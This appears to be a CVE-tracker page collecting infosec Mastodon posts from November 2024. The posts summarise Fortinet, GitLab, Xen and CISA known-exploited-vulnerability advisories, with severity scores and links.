[ZDI-24-1514|CVE-2024-11393] (0Day) Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) zerodayinitiative.com/advisori

##


CVE-2024-31449
(0 None)

EPSS: 0.04%

1 posts

N/A

CVE-2024-40590
(0 None)

EPSS: 0.00%

1 posts

N/A

screaminggoat@infosec.exchange at 2024-11-13T14:12:42.000Z ##

Additional Fortinet security advisories:

  1. FG-IR-23-396 CVE-2024-23666 (7.5 high) Readonly users could run some sensitive operations (FortiAnalyzer)
  2. FG-IR-24-033 CVE-2024-33510 (4.3 medium) SSLVPN WEB UI Text injection (FortiOS/FortiProxy)
  3. FG-IR-24-098 CVE-2024-31496 (6.7 medium) Stack buffer overflow in CLI command (FortiAnalyzer/FortiManager)
  4. FG-IR-22-155 CVE-2024-40590 (4.8 medium) missing digital certificate validation (FortiPortal)

No mention of exploitation.

#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-10240
(0 None)

EPSS: 0.00%

1 posts

N/A

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

cisakevtracker@mastodon.social at 2024-11-12T19:01:24.000Z ##

CVE ID: CVE-2021-41277
Vendor: Metabase
Product: Metabase
Date Added: 2024-11-12
Vulnerability: Metabase GeoJSON API Local File Inclusion Vulnerability
Notes: github.com/metabase/metabase/s ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-45819
(0 None)

EPSS: 0.00%

1 posts

N/A

andersonc0d3@infosec.exchange at 2024-11-12T13:47:55.000Z ##

Xen Security Advisory 464 v2 (CVE-2024-45819) - libxl leaks data to PVH guests via ACPI tables

seclists.org/oss-sec/2024/q4/8

##

CVE-2024-27864
(0 None)

EPSS: 0.00%

1 posts

N/A

technotenshi@infosec.exchange at 2024-11-08T18:14:14.000Z ##

New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.

jhftss.github.io/A-New-Era-of-

#macOS #Infosec #SandboxEscape #CVE

##
